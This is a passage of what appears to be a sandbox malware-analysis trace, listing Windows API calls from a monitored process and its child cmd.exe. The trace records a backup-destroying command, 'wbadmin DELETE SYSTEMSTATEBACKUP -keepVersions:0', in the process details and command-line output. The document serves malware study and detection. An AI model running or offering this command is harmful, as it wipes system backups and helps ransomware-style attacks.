dwFlags=0x0, lpMem=0x629310 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629360 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, 
dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643a48 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6439b0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643948 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6435e0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6292c0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64d828 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64d7d0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64cfc8 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64c7c0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64c730 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b870 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685ad0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6333c8 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63aac0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6290e0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eae0 | out: hHeap=0x610000) returned 1 
[0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eb28 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x683270 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a350 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f158 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f170 | out: hHeap=0x610000) returned 1 [0077.263] GetCurrentThreadId () returned 0x2a8 [0077.263] DestroyWindow (hWnd=0x202ac) returned 1 [0077.366] NtdllDefWindowProc_W () returned 0x0 [0077.367] NtdllDefWindowProc_W () returned 0x0 [0077.367] NtdllDefWindowProc_W () returned 0x0 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63ea78 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d718 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f248 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.368] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63de18 | out: hHeap=0x610000) returned 1 [0077.368] SetEvent (hEvent=0x150) returned 1 [0077.370] GetCurrentThreadId () returned 0x2a8 [0077.370] WaitForSingleObject (hHandle=0x12c, 
dwMilliseconds=0x1388) returned 0x0 [0077.370] GetExitCodeThread (in: hThread=0x12c, lpExitCode=0x18f874 | out: lpExitCode=0x18f874) returned 1 [0077.370] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x644ee8) returned 0x0 [0077.370] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.370] ReleaseActCtx (in: hActCtx=0x63e17c | out: hActCtx=0x63e17c) [0077.370] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.370] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.370] UnregisterClassW (lpClassName=0xc168, hInstance=0x74af0000) returned 1 [0077.370] UnregisterClassW (lpClassName=0xc16a, hInstance=0x74af0000) returned 1 [0077.370] OleUninitialize () [0077.464] DestroyWindow (hWnd=0x50116) returned 1 [0077.464] NtdllDefWindowProc_W () returned 0x0 [0077.465] PostQuitMessage (nExitCode=0) [0077.466] DllCanUnloadNow () returned 0x0 [0077.466] DllCanUnloadNow () returned 0x1 [0077.466] DllCanUnloadNow () returned 0x1 [0077.467] free (_Block=0x3bdcc0) [0077.889] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0077.889] EtwUnregisterTraceGuids () returned 0x0 [0077.889] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0077.889] EtwUnregisterTraceGuids () returned 0x0 [0077.890] ??3@YAXPAX@Z () returned 0x1 [0077.890] free (_Block=0x3bdbb0) [0077.892] NtdllDefWindowProc_W () returned 0x0 [0077.893] FreeLibrary (hLibModule=0x74af0000) returned 1 [0077.900] GetCurrentThreadId () returned 0x2a8 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6333e8 | out: hHeap=0x610000) returned 1 [0077.900] DeleteObject (ho=0x170a08ae) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649c88 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686f88 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649f10 | out: hHeap=0x610000) 
returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x692000 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a250 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62f3a0 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d120 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644bc8 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fb78 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.901] DeleteObject (ho=0xe0806be) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d150 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d0c0 | out: hHeap=0x610000) returned 1 [0077.901] EtwUnregisterTraceGuids () returned 0x0 [0077.901] EtwUnregisterTraceGuids () returned 0x0 [0077.901] EtwEventUnregister () returned 0x0 [0077.901] EtwEventUnregister () returned 0x0 [0077.901] CloseHandle (hObject=0xbc) returned 1 [0077.901] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0077.902] CloseHandle (hObject=0xc0) returned 1 [0077.902] LocalFree (hMem=0x62e948) returned 0x0 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree 
(in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6352a8 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62e740 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x623cf0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62e988 | out: hHeap=0x610000) returned 1 [0077.903] FreeLibrary (hLibModule=0x76e40000) returned 1 [0077.903] FreeLibrary (hLibModule=0x75300000) returned 1 [0077.903] free (_Block=0x3b2640) [0077.910] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0077.910] ExitProcess (uExitCode=0x0) Thread: id = 19 os_tid = 0x8ec Thread: id = 21 os_tid = 0x92c [0067.728] GetCurrentThreadId () returned 0x92c [0067.728] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.729] CoInitialize (pvReserved=0x0) returned 0x0 [0067.729] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0075.434] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1006) returned 0x693fe8 [0075.434] PostMessageW (hWnd=0x202ac, Msg=0x8002, 
wParam=0x0, lParam=0x0) returned 1 [0075.435] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0077.368] CoUninitialize () [0077.369] FreeLibraryAndExitThread (hLibModule=0x74af0000, dwExitCode=0x0) [0077.369] GetCurrentThreadId () returned 0x92c Thread: id = 24 os_tid = 0x95c [0068.732] GetCurrentThreadId () returned 0x95c Thread: id = 31 os_tid = 0x9cc [0069.677] GetCurrentThreadId () returned 0x9cc Thread: id = 32 os_tid = 0x9dc [0069.710] GetCurrentThreadId () returned 0x9dc Thread: id = 33 os_tid = 0x9ec [0074.321] GetCurrentThreadId () returned 0x9ec [0074.578] GetCurrentThreadId () returned 0x9ec Thread: id = 35 os_tid = 0xa1c [0074.663] GetCurrentThreadId () returned 0xa1c [0074.689] GetCurrentThreadId () returned 0xa1c Thread: id = 36 os_tid = 0xa2c [0074.699] GetCurrentThreadId () returned 0xa2c Thread: id = 38 os_tid = 0x600 [0074.777] GetCurrentThreadId () returned 0x600 [0074.866] GetCurrentThreadId () returned 0x600 Thread: id = 40 os_tid = 0xb64 [0074.935] GetCurrentThreadId () returned 0xb64 [0075.007] GetCurrentThreadId () returned 0xb64 Thread: id = 42 os_tid = 0xbac [0075.128] GetCurrentThreadId () returned 0xbac [0075.402] GetCurrentThreadId () returned 0xbac Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x47abe000" os_pid = "0x9fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 
00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0xa0c [0076.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7c4 | out: lpSystemTimeAsFileTime=0x2ef7c4*(dwLowDateTime=0xf29de1a0, dwHighDateTime=0x1d61645)) [0076.913] GetCurrentProcessId () returned 0x9fc [0076.913] GetCurrentThreadId () returned 0xa0c [0076.913] GetTickCount () returned 0x114977f [0076.913] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef7bc | out: lpPerformanceCount=0x2ef7bc*=19726743436) returned 1 [0076.914] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.914] __set_app_type (_Type=0x1) [0076.914] __p__fmode () returned 0x770331f4 [0076.914] __p__commode () returned 0x770331fc [0076.914] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.914] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.915] GetCurrentThreadId () returned 0xa0c [0076.915] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa0c) returned 0x60 [0076.915] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.915] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.915] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.915] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.915] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef754 | out: phkResult=0x2ef754*=0x0) returned 0x2 [0076.916] VirtualQuery (in: lpAddress=0x2ef78b, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) 
returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.916] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef724, dwLength=0x1c | out: lpBuffer=0x2ef724*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.916] GetConsoleOutputCP () returned 0x1b5 [0076.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.916] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.916] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.916] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.917] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.917] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.917] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.917] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.917] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.917] GetEnvironmentStringsW () returned 
0x4c2080* [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xaca) returned 0x4c2b58 [0076.918] FreeEnvironmentStringsW (penv=0x4c2080) returned 1 [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x4) returned 0x4c0cb8 [0076.918] GetEnvironmentStringsW () returned 0x4c2080* [0076.918] GetProcessHeap () returned 0x4b0000 [0076.918] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xaca) returned 0x4c3630 [0076.918] FreeEnvironmentStringsW (penv=0x4c2080) returned 1 [0076.918] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x68) returned 0x0 [0076.918] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 
[0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegCloseKey (hKey=0x68) returned 0x0 [0076.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee6c4 | out: phkResult=0x2ee6c4*=0x68) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x40, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x1, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x0, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, 
lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x4, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x4) returned 0x0 [0076.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee6cc, lpData=0x2ee6d0, lpcbData=0x2ee6c8*=0x1000 | out: lpType=0x2ee6cc*=0x0, lpData=0x2ee6d0*=0x9, lpcbData=0x2ee6c8*=0x1000) returned 0x2 [0076.920] RegCloseKey (hKey=0x68) returned 0x0 [0076.920] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.920] srand (_Seed=0x5e9c43c9) [0076.920] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" [0076.920] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" [0076.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.920] GetProcessHeap () returned 0x4b0000 [0076.920] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4c2080 [0076.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4c2088, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.920] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.920] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 
11 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.920] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] HeapFree (in: hHeap=0x4b0000, dwFlags=0x0, lpMem=0x4c2b58 | out: hHeap=0x4b0000) returned 1 [0076.921] GetEnvironmentStringsW () returned 0x4c2298* [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xae2) returned 0x4c4bf8 [0076.921] FreeEnvironmentStringsW (penv=0x4c2298) returned 1 [0076.921] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.921] GetProcessHeap () returned 0x4b0000 [0076.921] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x54) returned 0x4c56e8 [0076.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef490 | out: 
